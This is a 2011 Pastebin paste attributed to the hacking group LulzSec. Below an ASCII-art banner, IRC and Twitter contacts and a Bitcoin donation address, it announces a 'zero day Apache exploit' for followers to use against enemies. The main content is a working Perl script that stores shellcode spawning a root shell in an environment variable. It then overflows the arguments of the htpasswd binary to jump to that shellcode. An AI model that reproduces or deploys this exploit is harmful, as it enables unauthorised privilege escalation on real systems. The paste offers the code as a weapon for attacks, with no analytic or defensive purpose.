Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2011
1,669
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.64 KB | None | 0 0
  1. RC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
  2. BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
  3. Twitter: @LulzSec
  4. Contact us: 614-LULZSEC
  5.  
  6. . /$$ /$$ /$$$$$$
  7. .| $$ | $$ /$$__ $$
  8. .| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
  9. .| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
  10. .| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
  11. .| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
  12. .| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
  13. .|________/ \______/ |__/|________/ \______/ \_______/ \_______/
  14. //Laughing at your security since 2011!
  15.  
  16. .-- .-""-.
  17. . ) ( )
  18. . ( ) (
  19. . / )
  20. . (_ _) 0_,-.__
  21. . (_ )_ |_.-._/
  22. . ( ) |lulz..\
  23. . (__) |__--_/
  24. . |'' ``\ |
  25. . | [Lulz] \ | /b/
  26. . | \ ,,,---===?A`\ | ,==y'
  27. . ___,,,,,---==""\ |M] \ | ;|\ |>
  28. . _ _ \ ___,|H,,---==""""bno,
  29. . o O (_) (_) \ / _ AWAW/
  30. . / _(+)_ dMM/
  31. . \@_,,,,,,---==" \ \\|// MW/
  32. .--''''" === d/
  33. . // SET SAIL FOR FAIL!
  34. . ,'_________________________
  35. . \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
  36. . _____ ,' ~~~ .-""-.~~~~~~ .-""-.
  37. . .-""-. ///==--- /`-._ ..-' -.__..-'
  38. . `-.__..-' =====\\\\\\ V/ .---\.
  39. . ~~~~~~~~~~~~, _',--/_.\ .-""-.
  40. . .-""-.___` -- \| -.__..-
  41.  
  42.  
  43.  
  44. Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemy's be overwhelmed with our Lulz!
  45.  
  46. ===========================================
  47.  
  48. #!/usr/bin/perl
  49. # 0 Day Apache Exploit
  50. # LulzSecurity #AntiSec
  51.  
  52. $shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
  53. "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
  54.  
  55.  
  56. $target = "/usr/local/apache/bin/htpasswd";
  57. $retaddr = 0xbffffffa - length($shellcode) - length($target);
  58.  
  59.  
  60. print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
  61.  
  62.  
  63. local($ENV{'XXX'}) = $shellcode;
  64. $newret = pack('l', $retaddr);
  65. $buffer = "A" x 272;
  66. $buffer .= $newret x 4;
  67. $buffer .= " ";
  68. $buffer .= "B" x 290;
  69.  
  70.  
  71. exec("$target -nb $buffer");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement